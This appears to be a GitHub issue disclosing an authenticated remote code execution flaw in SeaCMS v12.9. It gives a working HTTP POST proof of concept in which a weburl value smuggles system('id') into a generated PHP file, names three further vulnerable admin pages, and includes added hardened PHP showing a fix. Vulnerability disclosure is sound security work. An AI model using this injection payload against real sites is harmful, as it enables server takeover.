
SeaCMS v12.9 admin_ping.php Remote Code Execution

Open · pysnow1 opened this issue 1 year ago · 1 comment

Introduction

SeaCMS is a free, open-source website content management system written in PHP. The system is mainly designed to manage video-on-demand resources.

SeaCMS version 12.9 has a remote code execution vulnerability. It is caused by admin_ping.php concatenating user input directly into ping.php and writing it out without any processing, which allows authenticated attackers to execute arbitrary commands and obtain system permissions.

Environment

https://github.com/seacms-net/CMS/blob/master/SeaCMS_12.9_%E6%B5%B7%E6%B4%8BCMS%E5%AE%89%E8%A3%85%E5%8C%85.zip

Analysis

The weburl and token parameters passed to admin_ping.php are not filtered; they are concatenated directly and written into the admin_ping.php file, resulting in arbitrary code execution.

Verify

POST /xotry/admin_ping.php?action=set HTTP/1.1
Host: 192.168.126.128:8082
Cookie: PHPSESSID=8iuqqnar4ucddeqlp52sdmpbov
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

weburl=1";system('id');//&token=1

Accessing /data/admin/ping.php then executes the command successfully.

pysnow1 · Jun 13 '24 07:06
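The root cause described in this report is user input being interpolated into PHP source that is then written to disk and executed. The following is an added illustration, not SeaCMS code: a hypothetical reconstruction of that pattern beside a hardened version that validates the inputs and stores them as data (JSON) instead of executable code. Function names and the config path are assumptions.

```php
<?php
// Added illustration (not SeaCMS source). Function names are hypothetical.

// Unsafe pattern: user-controlled values are pasted into PHP source text and
// written to a file that is later included. A value containing a closing
// quote terminates the string literal, so whatever follows becomes PHP code.
function save_ping_config_unsafe(string $weburl, string $token, string $file): void
{
    $code = "<?php\n\$weburl=\"$weburl\";\n\$token=\"$token\";\n";
    file_put_contents($file, $code);
}

// Hardened version:
//  1. Validate each input against what it is supposed to be.
//  2. Never generate executable source from user data; persist a JSON
//     document and read it back with json_decode() when it is needed.
function save_ping_config_safe(string $weburl, string $token, string $file): bool
{
    // weburl must be an http(s) URL; token must be a short, plain identifier.
    if (filter_var($weburl, FILTER_VALIDATE_URL) === false
        || !in_array(parse_url($weburl, PHP_URL_SCHEME), ['http', 'https'], true)) {
        return false;
    }
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $token)) {
        return false;
    }
    $json = json_encode(['weburl' => $weburl, 'token' => $token], JSON_THROW_ON_ERROR);

    // Write to a temp file and rename so readers never see a partial config.
    $tmp = $file . '.tmp';
    if (file_put_contents($tmp, $json, LOCK_EX) === false) {
        return false;
    }
    return rename($tmp, $file);
}

// Reader side: the config is parsed as data, never include()d as code.
function load_ping_config(string $file): ?array
{
    $raw = @file_get_contents($file);
    if ($raw === false) {
        return null;
    }
    $cfg = json_decode($raw, true);
    return is_array($cfg) ? $cfg : null;
}

// Example usage with a constructed path (assumption, not the project's layout):
// save_ping_config_safe('https://example.test', 'abc123', __DIR__ . '/ping.json');
```

If the file must remain a PHP include for compatibility, emit each validated value with var_export(), which produces a correctly escaped PHP literal, rather than interpolating the raw string.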

[three screenshots] admin_ip.php, admin_smtp.php and admin_weixin.php have the same type of vulnerability.

pysnow1 · Jun 13 '24 09:06